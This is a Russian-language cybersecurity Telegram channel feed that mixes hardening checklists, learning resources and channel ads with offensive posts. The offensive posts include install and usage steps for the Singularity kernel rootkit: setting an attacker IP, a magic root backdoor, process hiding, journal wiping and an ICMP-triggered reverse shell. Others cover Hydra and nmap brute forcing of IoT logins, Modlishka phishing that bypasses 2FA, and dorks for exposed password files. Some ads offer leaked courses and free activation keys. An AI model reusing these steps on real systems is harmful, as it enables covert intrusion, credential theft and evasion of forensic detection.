CodeGuard: CyberSec Edition

⭐️ Подборка крутых шпор. 😈 CodeGuard | Chat

🌐Рассказ о том как я на сертификат хакера сдавал. Путь к OSCP Для тех кто не знает, OSCP — это самая первая и известная прикладная сертификация по пентесту от создателей Kali Linux.  Представляет из себя 24-часовой экзамен, в котором даётся VPN-подключение к тестовой лаборатории и хосты для взлома. Да-да, надо именно получить удалённый доступ через какую-то уязвимость и повысить привилегии до админа или рута, чтобы получить заветный скрытый файл. За каждый такой файл начисляются баллы для успешной сдачи. То есть, это своего рода CTF, но с более реальным целями. Здесь я хочу рассказать не только что это за зверь и с чем его едят, но и как к нему подготовиться. Вообще, если пентестер сдал OSCP, то его спокойно можно считать хорошим мидлом. Поэтому какие-то базовые понятия хакинга в начале обучения необходимы. 📂 Это может быть полезно 😈 CodeGuard | Chat

Лицо Udemy представили? — тут слили кучу курсов по IT от онлайн школ Материала почти на пол-терабайта, мы загрузили всё на канал, там есть: 🐍 Python и нейросети (28 полных курсов + библиотеки) 📈 Data Analysis + машинное обучение (15 курсов) 👨🏻‍💻 Frontend (от JS до React) — (20 курсов + библиотеки) 🤖 Backend + базы Данных (30 курсов) 🛡 Информационная безопасность (Защита+Атака) — (14 курсов) 🎮 Разработка игр (11 курсов) Всё можно забрать бесплатно и смотреть без скачивания ➡️ @IT_SLIV

🌡 Прокачка навыков программирования — большой список

C Puzzles — головоломки на языке С; Code Abbey — задачи по программированию + форум; CodeChef — регулярные соревнования по программированию; CodeCombat — обучение в формате игры (Python, JS, HTML/CSS); Codeforces — задачи и соревнования; Codewars — челленджи по множеству ЯП, есть система рангов; Coding Bat — тренировка Java и Python; CodinGame — решение задач через мини-игры (25 языков); Empire of Code — русскоязычная платформа с задачами по Python и JS; Exercism — упражнения на 48 языках; HackerRank — популярная платформа с тестами и задачами; InterviewBit — тренажёр для подготовки к интервью; LeetCode — топ для подготовки к собеседованиям; MAXimal — статьи и алгоритмы на русском; Programming Praxis — еженедельные новые задачи; Programming Skills — онлайн-тесты и вопросы для интервью; Programmr — практические задачки на разных ЯП; Project Euler — сложные задачи для математиков и программистов; Prolog Problems — задачи и курс по Prolog; PythonChallenge — необычные задачи для изучения Python; Rosalind — обучение биоинформатике через Python; Ruby Quiz — еженедельные викторины по Ruby; SQL-EX.RU — русскоязычные задачи по SQL; Timus Online Judge — архив задач с автопроверкой; Topcoder — соревнования и задачи от корпораций; W3Resource — упражнения по базам данных, JS, PHP, Excel и др; Питонтьютор — ресурс для новичков в Python на русском; Школа программиста — задачи для начинающих; Хекслет — практика с реальной удалённой машиной; Codebra — онлайн-курсы и задачи по разным технологиям.

Сохраняй, точно пригодиться) 🤯 — это ты, после проверки каждого ресурса))) 😈 CodeGuard | Chat

⭐️ Книга: «Взлом. Приемы, трюки и секреты хакеров. Версия 2.0» Год: 2022

Если хочешь узнать реальные техники и секреты взлома, а также способы защиты — эта книга из лучших статей журнала «Хакер» для тебя. Практические кейсы на примерах инжекта шелл-кода, атак на Active Directory, обхода антивирусов и многое другое. 👨‍💻 Что внутри: - Инжект шелл-кода в KeePass и обход антивирусов - ShadowCoerce атака на Active Directory - Эксплуатация heap allocation и SOAP-сервера на Linux - Взлом протекторов Themida, Obsidium, .NET Reactor - Создание DDoS-утилит и трейнеров для игр - Тестирование протоколов OSPF, EIGRP и DTP - Детальный разбор уязвимости Log4Shell Книга для тех, кто хочет углубиться в практический взлом и безопасность. 💠 Бери книгу → [Archive] 😈 CodeGuard | Chat | #book #hacking #infosec #pentest

❗️Самые «имбовые» каналы в Telegram по мнению пользователей: Hardware Club — здесь вы узнаете, как даже с маленьким бюджетом собрать мощный ПК. Разгон железа, оптимизация системы, новинки, лайфхаки, обзоры, комплектующие, готовые сборки. Windows Club — этот канал удивит даже уверенного пользователя Windows. Бесплатные ключи активации, полезные софты, сервисы, фишки и нейросети. Linux Club — это мечта для пользователей Linux. Здесь вы найдёте всё, от полезных команд в терминале, до обучающих уроков, которые пригодятся даже профи. Apple Club — все фишки, лайфхаки, функции и свежайшие новости для iOS и macOS, собранные в одном канале. ⚡️Даже Стив Джобс бы подписался на эти каналы, пользуйтесь

😈 Настройки Linux для жесткой защиты сервера от атак Жёсткая защита Linux-сервера — это комплекс мер по ограничению доступа, своевременному обновлению и мониторингу. Вот практический чеклист с командами для минимизации рисков. ➡️ Шаг 1. Обновление системы и автоматизация патчей

sudo apt update && sudo apt upgrade -y
sudo apt install unattended-upgrades -y

# Включение автообновлений (Debian / Ubuntu)
sudo dpkg-reconfigure --priority=low unattended-upgrades

Автоматические обновления позволяют быстро получать патчи безопасности без ручной работы. ➡️ Шаг 2. Создание отдельного администратора, отключение root SSH

# Создаём sudo-пользователя
sudo adduser adminuser
sudo usermod -aG sudo adminuser

# Отключаем вход по root в SSH
sudo sed -i 's/^PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config
sudo systemctl reload sshd

Работа под обычным пользователем с sudo снижает риски полного взлома системы. ➡️ Шаг 3. Настройка firewall (ufw) — минимизация открытых портов

sudo apt install ufw -y
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow OpenSSH
sudo ufw allow http
sudo ufw allow https

# Пример для нестандартного порта
sudo ufw allow 8080/tcp

sudo ufw enable
sudo ufw status verbose

Закрывайте все ненужные порты и ограничивайте входящие подключения. ➡️ Шаг 4. Включение Fail2Ban — защита от брутфорса

sudo apt install fail2ban -y
sudo systemctl enable fail2ban
sudo systemctl start fail2ban

# Минимальный конфиг в /etc/fail2ban/jail.local

cat << EOF | sudo tee /etc/fail2ban/jail.local
[DEFAULT]
bantime = 86400
findtime = 600
maxretry = 5

[sshd]
enabled = true
EOF

sudo systemctl restart fail2ban

Fail2Ban автоматически блокирует IP после нескольких неудачных попыток входа по SSH. ➡️ Шаг 5. Настройка SELinux или AppArmor для контроля доступа приложений - Включите SELinux:

sudo setenforce 1

- Проверяйте и настраивайте профили для сервисов - AppArmor включён по умолчанию в Ubuntu, управляйте профилями с помощью aa-status и aa-enforce 📚 Рекомендуется: - Регулярно аудитируйте открытые сервисы командой

sudo ss -tulnp

- Минимизируйте установленные пакеты:

dpkg --list
apt remove <unneeded-package>

📚 Источники: — Чеклист базовой безопасности — Безопасность сервера Linux — Базовая гигиена серверов Linux

Сохраняй сервер под жестким контролем — сохраняй пост, инфа полезная) 😈 CodeGuard | Chat

💻 Лучшие онлайн-сервисы для анализа IP-адресов Если хотите понять всё о подозрительном IP-адресе — эти сервисы помогут выявить VPN, прокси, мошенничество, геолокацию и признаки вредоносной активности. 🖥 IPQualityScore — Глубокий анализ участия IP в мошеннических схемах — Выявление VPN, прокси и смены устройств — Проверка вредоносного контента и редиректов — Использует данные более 10,000 honeypots и машинное обучение для точной детекции 🖥 IPInfo — Простой и удобный интерфейс — Определение геолокации, провайдера, ASN — Поддержка API для интеграций — Регулярные обновления данных 🖥 Maxmind — Точная геолокация по IP (GeoIP2) — Фрод-детекция, выявление VPN/прокси — Широкое применение в корпоративной безопасности и аналитике 🖥 VirusTotal — Проверка репутации IP и доменов — Использует более 100 источников для детекции угроз и вредоносной активности 🖥 MxToolBox — Специализация на анализе IP, связанных с доменами — Массовый поиск и мониторинг по доменным данным 🖥 IPVoid — Анализ IP на спам, вредоносную активность и черные списки —Совокупность нескольких инструментов для комплексного анализа 📌 Эти сервисы полезны для исследований, аудитов, расследований и повседневной безопасности. Сохраняйте себе и не забудь поставить реакцию 😈 CodeGuard | Chat

✈️Использование искусственного интеллекта в защите и атаке ИИ становится важнейшим инструментом в современном киберпространстве — и у защитников, и у злоумышленников. Ниже — ключевые применения и примеры.

🔥 ИИ для защиты: - Автоматический анализ поведения пользователей и систем для выявления аномалий - Интеллектуальные брандмауэры и системы обнаружения угроз, которые учатся на новом трафике - Обнаружение и блокировка фишинга, спама и вредоносных программ с помощью машинного обучения - Использование генеративного ИИ для распознавания и фильтрации сложных угроз - Автоматизация реагирования — от предложения сценариев до полного автопилотного ответа на атаки

🧨 ИИ в атаках: - Создание более сложных и адаптивных вредоносных программ и эксплойтов - Автоматический подбор и генерация уникальных вредоносных payload’ов - Влияние на социальную инженерию — генерация фишинговых писем и сообщений с высокой степенью достоверности - Использование ML-моделей для обхода антиспама и WAF - Сканирование и анализ уязвимостей в большом объёме данных за минимальное время

🛠 Пример использования с AI для защиты:

# Запуск AI-модуля в системе мониторинга (пример условный)
ai-threat-detect --mode learn --input /var/log/syslog
# Выдаёт предупреждения при аномалиях

💡 Важно помнить, что ИИ помогает не заменить специалистов, а повысить их эффективность. Системы адаптируются, учатся и расширяют возможности, но человек остаётся в центре процесса принятия решений.

📚 Для подробного изучения: — https://pro32.com/ru/article/ii-i-kiberbezopasnost/ — https://ptsecurity.com/research/analytics/iskusstvennyi-intellekt-v-kiberzaschite/ — https://developers.sber.ru/help/gigachat-api/cybersecurity

🚀 Искусственный интеллект — мощный союзник и новый фронт в кибербезопасности 😈 CodeGuard | Chat

🐧 Хочешь освоить Linux и Python, но без скучных лекций и боли? В PyLinux всё по-другому: 🔵 Простые объяснения, даже сложных тем 🔵 Полезные скрипты и примеры 🔵 Книги, шпаргалки, гайды 🔵 и многое другое.... 👉 Всё, чтобы ты рос в IT без стресса и хаоса!

😈 Практическое применение OSINT для подготовки атаки OSINT (Open Source Intelligence) — мощный инструмент для сбора информации о цели перед пентестом или атакой. Это позволяет точно определить слабые места и подготовить эффективную стратегию без нарушения законов.

Основные этапы работы с OSINT: ⚡️ 1. Пассивный сбор — изучаем доступные данные без взаимодействия с целью: - Поиск в соцсетях, на сайтах, форумах - Анализ общедоступных документов и метаданных - Использование архивов и кэша поисковиков ⚡️ 2. Активный сбор — аккуратное взаимодействие с целью, например, запросы DNS или открытые порты, чтобы не выдать себя ⚡️ 3. Анализ и фильтрация — систематизируем и отбрасываем лишнее, выделяем полезное

🛠 Полезные инструменты:

# Поиск информации о IP и сети
shodan host <ip>

# Проверка и сбор данных с соцсетей
sherlock username

# Проверка активности домена и связей
whois example.com
dig example.com ANY

# Сбор поддоменов и расширенная разведка
subfinder -d example.com

# Анализ публичных документов и утечек
theHarvester -d example.com -b all

OSINT помогает понять, где и как атаковать, минимизируя лишние риски и усилия. 🤔 Разбор кейсов — на proglib.io и habr.com. 😈 CodeGuard | Chat

😈 Атаки на IoT-устройства: практические примеры и Linux-команды для защиты В 2025 году атаки на умные устройства продолжают стремительно расти. Злоумышленники используют массовое сканирование и автоматический подбор паролей для взлома камер, роутеров и других IoT-девайсов. 🟫 Полезные команды для Linux — поиск и защита IoT:

# Сканируем сеть на устройства с открытым Telnet/SSH (быстрый поиск уязвимых IoT)
sudo nmap -p 22,23 --open --script ssh-brute,ftp-brute -iL targets.txt

# Поиск IoT в интернете через Shodan
shodan host <ip_устройства>

# Проверка открытых портов и сервисов на IoT устройстве
nmap -sV <ip_устройства>

# Мониторинг сетевого трафика для поиска подозрительных соединений
tcpdump -i eth0 port 23 or port 22

# Проверка слабых паролей через Hydra brute force (например, для Telnet)
hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://<ip_устройства>

🔐 Советы по защите: - Следите, чтобы на устройствах не было стандартных паролей и WPS отключён - Настраивайте сегментацию сети — отделяйте IoT от ключевой инфраструктуры - Обновляйте прошивки и следите за уязвимостями производителя - Используйте IDS/IPS для обнаружения аномалий в трафике - Внедряйте многофакторную аутентификацию, где возможно

📚 Подробнее в статьях: — Securitymedia.org — Codeby.net

Своевременные меры и регулярный мониторинг снижает риски IoT-инцидентов 😈 CodeGuard | Chat

💰 Как вкатиться в DevOps бесплатно?  Сообщество академии GigaDevOps - настоящая находка с огромным количеством качественного материала в этой сфере. Как для новичков, так и для продвинутых в этой сфере. ⚡️У ребят есть своё комьюнити: там есть живой чат с senior-devops, мок-собесы, смол-токи: и всё это совершенно бесплатно.   GigaDevOps специализируется на профессиональном менторинге до оффера, где идет упор на практику и индивидуальный подход. Хотите сменить грейд или выйти на более высокий доход с личным ментором? Подпишись на Telegram-канал и получи МАКСИМАЛЬНУЮ СКИДКУ в честь распродажи на 11.11 + бесплатную консультацию по твоему кейсу.  👉Начать осваивать высокооплачиваемую и незафоршенную профессию прямо сейчас!

👩‍💻[Перевод] Можно ли было обнаружить бэкдор XZ при более продуманной работе с пакетами в Git и Debian? Обнаружение бэкдора в XZ Utils весной 2024 года поразило опенсорс-сообщество и подняло серьёзные вопросы о безопасности цепочки поставок ПО. В этом посте мы изучим, могло ли улучшение практик работы с пакетами Debian помочь в выявлении этой угрозы, приведём руководство по аудиту пакетов и предложим улучшения на будущее. 📂 Перейти к статье 😈 CodeGuard | Chat

😵‍💫 Singularity — мощный Linux Kernel Rootkit для современных ядер 6х Singularity — это модуль ядра Linux, разработанный для современных версий ядра (6.x), способный скрывать своё присутствие и обеспечивать скрытый контроль над системой.

🔥 Основные возможности: - Сокрытие процессов через фильтрацию на уровне syscall, скрывает процессы из /proc, ps, top и других системных команд - Скрытие файлов и директорий по заданным шаблонам (например, «singularity») - Скрытие сетевых портов, включая фильтрацию /proc/net/*, скрывает порт 8081 от ss, netstat, lsof - Эскалация привилегий с помощью сигнала kill -59 PID или переменной окружения MAGIC=mtz bash для получения root доступа - Скрытая обратная связь по ICMP-сигналу (magic ICMP packet) для запуска скрытого обратного шелла - Скрытие модуля ядра из списков, журналов ядра (dmesg), фильтрация логов для удаления следов - Блокировка механизмов трассировки и отладки системы, таких как debugfs, ftrace, BPF программы - Нормализация индикаторов taint ядра для устранения признаков загрузки несертифицированных модулей

🛠 Установка:

cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
# Перед компиляцией измените IP в modules/icmp.c на IP атакующего
make
sudo insmod singularity.ko
sudo bash scripts/journal.sh
sudo bash scripts/x.sh

💡 Использование (примеры): — Скрыть процесс с PID:

kill -59 <PID>

— Получить root shell:

MAGIC=mtz bash

— Скрыть открытый порт Откройте порт 8081, он останется невидимым для системных инструментов — Запуск обратного шелла через ICMP: На атакующей машине запустите слушатель и выполните скрипт:

sudo python3 scripts/singularity_icmp_trigger.py <IP_цели>

📚 Источники: GitHub, Blog.kyntra.io Singularity — это вызов для специалистов по цифровой криминалистике и безопасности, настоящий «финальный босс» Linux rootkit, который сложен для обнаружения и удаления ставь реакцию, для тебя это легко — для меня мотивация 👍 😈 CodeGuard | Chat

⚡ Совет на 2025 год — не трать деньги на дорогие IT-курсы! Обучение стоит дорого, поэтому в Telegram появились обучающие каналы по всем IT-направлениям: 👩‍💻 Python – @python_tg 👩‍💻 Frontend – @frontend_tg 💻 InfoSec & Хакинг – @infosec_tg 👩‍💻 Java – @java_tg 👩‍💻 C / C++ – @plusplus_tg 👩‍💻 C# & GameDev – @csharp_tg 👩‍💻 Data Science – @datascience_tg 👩‍💻 DevOps – @devops_tg 👩‍💻 Linux – @linux_tg 👩‍💻 Весь IT – @techno_tg 👩‍💻 Курсы IT – @itcourse_tg 🤖 ChatGPT для IT — @chatgpt Не плати за то, что можно получить бесплатно — подписывайся и учись!

😈 Инструмент для пентеста: обход двухфакторной аутентификации с Modlishka Modlishka — это open-source инструмент для penetration testing, написанный на Go. Он работает с сетевыми протоколами HTTP(S), TLS, WebSocket и др., позволяя перехватывать и анализировать трафик между жертвой и целевым сайтом. 💡 Modlishka реализует метод Adversary-in-the-Middle (AitM), который позволяет не только перехватывать логины и пароли, но и обходить многие виды 2FA/МFA (двухфакторной аутентификации). Жертва вводит коды двухфакторной защиты, но Modlishka перехватывает сессионные cookies и токены, что дает злоумышленнику полный доступ к аккаунту. 🚀 Инструмент включает множество скриптов для аудита безопасности веб-приложений с 2FA. Это один из первых публичных инструментов, показавших как автоматизировать фишинговые атаки с обходом 2FA и увеличением шансов успешного взлома. 📥 Репозиторий на GitHub 😈 CodeGuard | Chat

😎 DorkGPT — помощник в создании Google Dorks с ИИ DorkGPT — это онлайн-инструмент на базе искусственного интеллекта, который автоматизирует создание эффективных Google Dorks для поиска уязвимостей и скрытой информации. 🔥 Практические шаги: 1. Перейдите на сайт DorkGPT 2. Введите описание задачи, например: "Найти общедоступные конфигурационные файлы с паролями" 3. Получите сгенерированный запрос — можно сразу копировать и использовать для поиска в Google. 4. Для автоматизации с Linux используйте утилиту googler для работы с Google из командной строки:

sudo apt install googler
googler "site:example.com filetype:env password"

5. Собирайте результаты в файл и анализируйте их с помощью jq:

googler --json "inurl:wp-config.php" | jq '.[].link'

6. Для массовой проверки URL применяйте httpx

cat urls.txt | httpx -silent -status-code

🔗 Полезные ссылки: — Официальный сайт DorkGPT — Статья Google Dorking или используем Гугл на максимум — Ресурсы и базы Google Dorks

DorkGPT + Linux-инструменты — мощное сочетание для быстрого и точного OSINT и пентеста. 😈 CodeGuard | Chat

В Яндексе платят 300.000р, Сбер нуждается в инженерах, а в Тинькофф нехватка кадров «Бигтех по-русски» — место, где разработчики из крупных компаний рассказывают правду о работе мечты, зарплатах и жизни в IT. Присоединяйся: @bigtech

😈 Использование контейнеров и виртуализации для безопасного тестирования Контейнеры и виртуальные машины — базовые технологии для безопасного выполнения тестов и экспериментов с минимальными рисками для основной системы. 🟫 Примеры команд запуска и управления контейнерами:

# Запуск контейнера с Ubuntu для тестов
docker run -it --rm ubuntu bash

# Просмотр активных контейнеров
docker ps

# Получение списка образов
docker images

# Остановка и удаление контейнера
docker stop ontainer_idid> && docker rm ontainerer_id>

📌 Виртуализация (KVM, VMware, VirtualBox) — полная изоляция с эмуляцией аппаратного обеспечения: — Виртуальные машины запускают отдельную ОС, что даёт высокий уровень изоляции и контроль — Подходит для сложных сценариев тестирования, где нужно менять ядро, конфигурацию оборудования или ОС — Можно создавать снапшоты для отката после экспериментов — Требует больше ресурсов и времени на настройку по сравнению с контейнерами 🛠 Пример создания ВМ с KVM:

# Создание виртуальной машины с помощью virt-install
virt-install --name testvm --memory 2048 --vcpus 2 --disk size=20 --cdrom /path/to/os.iso --network network=default

⚡️ Рекомендации по безопасности: — Обновляйте хост и гостевые системы, чтобы не было уязвимостей — Изолируйте сети виртуальных сред от основной инфраструктуры — Используйте политики SELinux, AppArmor, seccomp для ограничения прав контейнеров — Сканируйте образы контейнеров на уязвимости (например, с помощью Trivy)

📚 Подробнее: - https://7universum.com/ru/tech/archive/item/13725 - https://www.kaspersky.ru/blog/container-security/36087/ - https://habr.com/ru/companies/vk/articles/652149/

😈 CodeGuard | Chat